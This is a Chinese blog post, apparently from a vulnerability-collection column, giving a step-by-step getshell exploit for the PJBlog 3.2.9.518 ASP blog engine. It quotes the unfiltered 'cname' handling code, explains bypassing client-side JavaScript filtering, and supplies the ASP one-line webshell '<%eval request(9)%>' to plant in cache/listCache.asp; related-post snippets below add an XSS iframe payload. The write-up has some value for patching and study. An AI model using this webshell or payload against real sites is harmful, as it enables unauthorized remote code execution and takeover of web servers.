PJBlog 3.2.9.518 getwebshell 漏洞

最新推荐文章于 2021-08-06 19:50:55 发布
最新推荐文章于 2021-08-06 19:50:55 发布
阅读量584 收藏
点赞数
分类专栏: 漏洞收集 文章标签: function 破解 asp class blog tags

作者:不走的钟
版本:PJblog 3.2.9.518(2012/5/9日时为最新版本)

漏洞利用条件:

1、使用全静态模式(默认情况是全静态模式)

2、用户可以发帖(默认普通用户不能发帖,所以有点鸡肋)

漏洞描述:PJblog 3.2.9.518使用js过滤特殊字符,在使用全静态模式下,普通用户发帖即可插入asp一句话木马。

PJblog 3.2.9.518的安全还是非常不错,密码采用了sha1(pass+salt)方式,salt为6位,在这样的情况下,对注入还是非常有效,即使拿到密码也很难破解。

class/cls_logAction.asp部分代码如下:

<%
Class logArticle
………………省略………………
outIndex = outIndex & “[""A"";"&AListC&";("&clearT(AList)&")] ” & Chr(13)
outIndex = outIndex & “[""G"";"&GListC&";("&clearT(GList)&")] ” & Chr(13)
Dim CateKeys, CateItems, CateHKeys, CateHItems
CateKeys = CateDic.Keys
CateItems = CateDic.Items
CateHKeys = CateHDic.Keys
CateHItems = CateHDic.Items
For i = 0 To CateDic.Count -1
outIndex = outIndex & “["""&CateKeys(i)&""";"&CateHItems(i)&";("&clearT(CateItems(i))&")] ” & Chr(13)
Next

SaveList = SaveToFile(outIndex, “cache/listCache.asp”)

%>

SaveToFile函数是将outIndex内容写入到cache/listCache.asp中。

blogpost.asp中调用了 logArticle,部分代码如下:

<%
……………………
Set lArticle = New logArticle
lArticle.categoryID = request.Form(“log_CateID”)
lArticle.logTitle = request.Form(“title”)
lArticle.logAuthor = memName
lArticle.logEditType = request.Form(“log_editType”)
lArticle.logIntroCustom = request.Form(“log_IntroC”)
lArticle.logIntro = request.Form(“log_Intro”)
lArticle.logWeather = request.Form(“log_weather”)
lArticle.logLevel = request.Form(“log_Level”)
lArticle.logCommentOrder = request.Form(“log_comorder”)
lArticle.logDisableComment = request.Form(“log_DisComment”)
lArticle.logIsShow = IsShow
lArticle.logIsTop = request.Form(“log_IsTop”)
lArticle.logIsDraft = request.Form(“log_IsDraft”)
lArticle.logFrom = request.Form(“log_From”)
lArticle.logFromURL = request.Form(“log_FromURL”)
lArticle.logDisableImage = request.Form(“log_disImg”)
lArticle.logDisableSmile = request.Form(“log_DisSM”)
lArticle.logDisableURL = request.Form(“log_DisURL”)
lArticle.logDisableKeyWord = request.Form(“log_DisKey”)
lArticle.logMessage = request.Form(“Message”)
lArticle.logTrackback = request.Form(“log_Quote”)
lArticle.logTags = request.Form(“tags”)
lArticle.logPubTime = request.Form(“PubTime”)
lArticle.logPublishTimeType = request.Form(“PubTimeType”)
If blog_postFile = 2 Then
lArticle.logCname = request.Form(“cname”)
lArticle.logCtype = request.Form(“ctype”)
End If
lArticle.logReadpw = pws
lArticle.logPwtips = pwtips
lArticle.logPwtitle = pwtitle
lArticle.logPwcomm = pwcomm
lArticle.logMeta = request.Form(“log_Meta”)
lArticle.logKeyWords = keyword
lArticle.logDescription = B_description
if request.form(“FirstPost”) = 1 then
lArticle.isajax = false
lArticle.logIsDraft = false
postLog = lArticle.editLog(request.Form(“postbackId”))
else
lArticle.isajax = false
postLog = lArticle.postLog
end if
Set lArticle = Nothing
%>

lArticle.logCname = request.Form(“cname”),并没有过滤”<%” 和”%>”

漏洞利用方法:

1、用户登陆,发表文章,如下图:

2、禁止本地js,必须要使用这步,否则你无法输入’<’和’>’,因为作者已经考虑到安全问题,调用common.js本地过滤,
common/common.js 部份内容如下:
1
//创建文件夹规则 example:
2
//<input οnblur=”ReplaceInput(this,window.event)” οnkeyup=”ReplaceInput(this,window.event)” />
3
function ReplaceInput(obj, cevent){
4
var str = ["<", ">", "/", "\\", ":", "*", "?", "|", "\"", /[\u4E00-\u9FA5]/g];
5
if(cevent.keyCode != 37 && cevent.keyCode != 39){
6
//obj.value = obj.value.replace(/[\u4E00-\u9FA5]/g,”);
7
for (var i = 0 ; i < str.length ; i++){
8
obj.value = obj.value.replace(str[i], “”);
9
}
10
}
11
}
3、在别名处插入<%eval request(9)%>,提交后,即可在cache/listCache.asp中会写入一句话木马,密码为9
临时解决方案,禁止普通用户发帖,
7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
weixin_39553904的博客
05-30 987
动易网站管理系统vote.asp页面存在SQL注入漏洞测试系统:动易(PowerEasy CMS SP6 071030以下版本)安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。漏洞描述:vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入但是其语句里面过滤...
PJBlog3博客程序源码 v3.0.6.170
03-17
这是一个网络上被广泛使用的博客程序,完全开源,作者也经常更新。 PJBlog是由舜子(陈子舜,英文名字PuterJam,PJblog就是以他英文名字缩写命名的,他本人就职于腾讯公司QZONE开发组)所开发的一套开源免费的中文个人博客系统程序,采用asp+Access的技术,PJBlog同时支持简繁中文,UTF-8编码,相对于其他系统,PJBlog具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。 起初完成这个版本的时候是2008.10月份,经过漫长的细心研究,发现的BUG不少.因为这个别名功能几乎动了所有PJ原文件.而且修改了缓存结构.舜子写的缓存结构很好,开始一直都没有看懂.现在想想,这段时间呆在PJ开发团队收获还不少.也坚定了我开发PJ的信心.这里,我也非常感谢论坛管理员Captain的支持和帮助,是他给了我信心;也非常感谢舜子给我这次机会,在和舜子的交流中,我学到了很多东西,那是宝贵的,值得珍惜的东西.最后,我希望PJ以后的路能稳稳地走下去,不断发展. 4.22补丁: 增加Checkxss()重要函数。 PJBlog170版本重要安全补丁详情:http://bbs.pjhome.net/thread-52214-1-1.html
PJBlog3 v3.2.9.518.zip
07-05
PJBlog是由舜子(陈子舜,英文名字PuterJam,PJblog就是以他英文名字缩写命名的,他本人就职于腾讯公司QZONE开发组)所开发的一套开源免费的中文个人博客系统程序,采用asp Access的技术,PJBlog同时支持简繁中文,UTF-8编码,相对于其他系统,PJBlog具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。     PJBlog3 v3.2.9.518 发布 在这个小光棍节的日子里,PJBlog再发布新的版本,本次仅针对BUG进行修复,功能上有部分更新,两种升级方式,按照各自需求选择升级,所有PJ版本的用户均可升级。 具体更新内容如下: 1、修复全动态模式下相关日志显示的BUG 2、修复UBB的一处错误[code] 3、修正全静态页面下的会员登录发表评论验证码的问题 4、为tag页面增加标签日志数 5、美化评论留言回复邮件的格式 6、修改G头像的默认头像到本地images/gravatar.gif 7、增加博主回复评论G头像(需要修改skin) 8、增加评论楼层显示 9、去除TAG标签的technorati.com代码 10、其他一些小的修改
PJBlog3v3.0漏洞利用工具
09-19
PJBlog3v3.0漏洞利用工具VBS版!
Asp博客系统PJBlog3v3.2.9.518
07-27
PJBlog是由舜子(陈子舜,英文名字PuterJam,PJblog就是以他英文名字缩写命名的,他本人就职于腾讯公司QZONE开发组)所开发的一套开源免费的中文个人博客系统程序,采用asp Access的技术,PJBlog同时支持简繁中文,UTF-8编码,相对于其他系统,PJBlog具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。 PJBlog3 3.2.9.518 更新内容:
PJBlog3完整手动版
10-30
PJBlog3源代码v2.8.5.150
PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码0day
收集盒 Book box
06-26 2432
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术在文件Action.asp中:ElseIf Request.QueryString(“action”) = “updatepassto” Then //第307行If ChkPost() ThenDim e_Pass, e_RePass, e_ID
PJblog跨站漏洞利用及修补
weixin_30950887的博客
06-27 119
跨站漏洞成功演示代码: [font=expression(container.document.write(unescape('%3Ciframe%20src%3D%27http%3A//www.godx.cn%27%3E%3C/iframe%3E')))]God[/font] 对策。。。屏蔽关键字如果不用屏蔽关键字的办法, 则使用下面的办法修补漏洞用记事本打开 guestbook.asp...
发布一套Vista风格的PJBlog皮肤
dh20156风之石的专栏
03-26 1086
发布一套Vista风格的PJBlog皮肤,目前只支持FF背景透明,IE7以下不支持!效果请见:http://www.jxxg.com/blog/dh20156_369/用FF或IE7浏览!皮肤下载地址:http://www.jxxg.com/dh20156/vista1.rar参考图片:
PJBlog3 时间流逝模板
11-25
PJBlog3 时间流逝模板
pjblog 3 .0 正式版
03-03
中国 最好的asp 单用户博客程序 发布了
PJBlog3 3.2.9.518
04-30
PJBlog3 3.2.9.518 更新内容: 1、修复全动态模式下相关日志显示的BUG 2、修复UBB的一处错误[code] 3、修正全静态页面下的会员登录发表评论验证码的问题 4、为tag页面增加标签日志数 5、美化评论留言回复邮件的...
pj博客pjblog3 3.2.9.506
03-23
PJBlog3v3.2.9.506更新说明 1、去除未完成的语言包,决定暂不增加语言包功能2、添加静态页面上下模块3、优化评论审核功能4、优化用户登录状态表现5、优化缓存路径的读取6、增加几个浏览器及操作系统的识别7、优化...
评论的ajax请求,pjblog发表评论用的ajaxJS.js
weixin_34748612的博客
08-06 325
pjblog发表评论用的ajaxJS.js更新时间:2007年04月25日 00:00:00 作者:document.write('数据正在读取中,请等候...') functionshowloading(){varobj=document.getElementById("loadingg")if(obj.style.display!=""){obj.style.left=((docum...
PJBlog3 3.0.6.170最新版即将发布
11-04 2519
 pjblog3公测版在2.8.5.157发布后,已经相当稳定,实现了很多功能,沉寂了将近两个月,在这两个月中PJHOME几位内部人员在着手修补BUG和增加一些重要的功能。本来可以在这个月初就发布新版本的,但由于作者PJ本人在腾讯QZONE的工作繁忙,一直没有时间。最近去西安招人后回到深圳才算能挤出点时间来。    这个版本已知的改进方面有修正2.8.5.157中的某些BUG和疏漏。    增加日
PJBlog3 v3.2.9.506
10-18
PJBlog3 v3.2.9.506更新说明1、去除未完成的语言包,决定暂不增加语言包功能2、添加静态页面上下模块 3、优化评论审核功能 4、优化用户登录状态表现 5、优化缓存路径的读取 6、增加几个浏览器及操作系统的识别 7、...
Asp博客系统 PJBlog3 v3.2.9.518-ASP源码.zip
12-15
ASP源码,压缩包解压密码:www.cqlsoft.com
PJBlog3 v3.2.9.506 免费的ASP博客系统.rar
07-09
PJBlog3 v3.2.9.506更新说明 1、去除未完成的语言包,决定暂不增加语言包功能 2、添加静态页面上下模块 3、优化评论审核功能 4、优化用户登录状态表现 5、优化缓存路径的读取 6、增加几个浏览器及操作系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值